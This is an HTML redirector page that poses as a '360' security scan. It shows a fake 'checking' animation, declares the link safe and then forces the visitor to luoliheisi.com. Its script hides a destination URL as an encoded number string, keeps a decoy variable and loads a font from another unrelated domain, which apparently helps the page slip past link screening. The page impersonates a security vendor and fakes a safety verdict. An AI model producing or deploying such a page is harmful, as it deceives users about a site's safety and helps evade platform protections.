<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <title>安全检测</title>
</head>
<body>
    <style type="text/css">
        body {
            margin: 0;
        }

        .wxtip {
            background: rgba(0, 0, 0, 0.5);
            text-align: center;
            position: fixed;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            z-index: 998;
            display: none;
        }


        .wxtip-txt {
            margin-top: 107px;
            color: #fff;
            font-size: 16px;
            line-height: 1.5;
        }


        @font-face {
            font-weight: normal;
            font-style: normal;
            font-family: "weui";
            src: url('https://www.avdhz.ml') format('truetype');
        }


        [class^="weui-icon-"],
        [class*=" weui-icon-"] {
            display: inline-block;
            vertical-align: middle;
            font: normal normal normal 14px/1 "weui";
            font-size: inherit;
            text-rendering: auto;
            -webkit-font-smoothing: antialiased;

            &:before {
                display: inline-block;
                margin-left: .2em;
                margin-right: .2em;
            }
        }

        .weui-icon-waiting:before {
            content: "\EA09";
        }

        .weui-icon-success:before {
            content: "\EA04"
        }

        .weui-btn_primary {
            background-color: #1AAD19;
        }

        .weui-btn {
            position: relative;
            display: block;
            margin-left: auto;
            margin-right: auto;
            padding-left: 14px;
            padding-right: 14px;
            box-sizing: border-box;
            font-size: 18px;
            text-align: center;
            text-decoration: none;
            color: #FFFFFF;
            line-height: 2.55555556;
            border-radius: 5px;
            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
            overflow: hidden;
            margin-bottom: 20px;
        }

        .weui-btn_default {
            color: #000000;
            background-color: #F8F8F8;
        }

        .weui-icon-waiting {
            color: #10AEFF;
        }

        .weui-icon-success {
            color: #1AAD19;
        }

        .icon {
            font-size: 93px;
            margin: 20px auto;
        }

        .actions {
            padding: 10px 30px;
        }

        .footer {
            position: absolute;
            bottom: 0;
            width: 100%;
            text-align: center;
            color: #999;
            font-size: 12px;
        }

        * {
            margin: 0;
            padding: 0;
        }

        img {
            max-width: 100%;
            height: auto;
        }
    </style>
    <div style="text-align:center;padding:60px 10px 50px 10px;">
        <i class="weui-icon-waiting icon" id="icon"></i>
        <p style="font-size:20px;color:#555;" id="iconText">正在安全检测</p>
        <p style="font-size:12px;color:#999;" id="subText"></p>
    </div>
    <div class="actions" id="goHome">
        <a href="https://luoliheisi.com" class="weui-btn weui-btn_primary" id="openSchemeLink" style="">点击前往</a>
    </div>
    <div class="footer">
        <p>360安全卫士提供技术支持</p>
        <p>Copyright © 1998 - <script>
                document.write(new Date().getFullYear())
            </script>. All Rights Reserved.</p>
        <br>
    </div>
    <div id="jcdiv" style="position: absolute;bottom: 0;left: 0;width: 0;height: 0;overflow: hidden;"></div>
    <script>
        var _ = 'https://baidu.com'; //这个不要动
        uu = '11041116111611121115105810471047110510461097111811001104112210461118110511121047'; //网址
        Times = 3000; //自动跳转,每1000就是1秒
        var u = [];
        for (var j = 4; j <= uu.length; j += 4) {
            u.push(String.fromCharCode(parseInt(uu.toString().substr(j - 4, 4)) - 1000));
        }

        _ = u.join('');
        var a = document.getElementById('openSchemeLink'),
            it = document.getElementById('iconText'),
            jcdiv = document.getElementById('jcdiv');;
        a.onclick = function () {
            var ael = document.createElement('a');
            ael.href ="https://luoliheisi.com"
            ael.setAttribute('rel', 'noreferrer');
            ael.click();
            setTimeout(function () {
                location.href ="https://luoliheisi.com"
            }, 333);
            return false;
        }
        var _i = 1;
        var si = setInterval(function () {
            var txt = '正在安全检测';
            for (var i = 0; i < _i; i++) {
                txt += '.';
            }
            it.innerText = txt;
            if (++_i > 3) {

                clearInterval(si);
                var icon = document.getElementById('icon');
                var subText = document.getElementById('subText');
                icon.classList.add("weui-icon-success");
                it.innerHTML = "已通过安全检测";
                locationFn();

            }
        }, 220);

        function locationFn() {
            var uu = setInterval(function () {
                subText.innerHTML = (Times / 1000) + "秒后跳转，如果没有自动跳转，请点击下方按钮前往";
                if (Times == 0) {
                    clearInterval(uu);
                    subText.innerHTML = "正在跳转，如果没有自动跳转，请点击下方按钮前往";
                    location.href ="https://luoliheisi.com"
                }
                Times -= 1000;
            }, 1000);
        }
    </script>
</body>

</html>
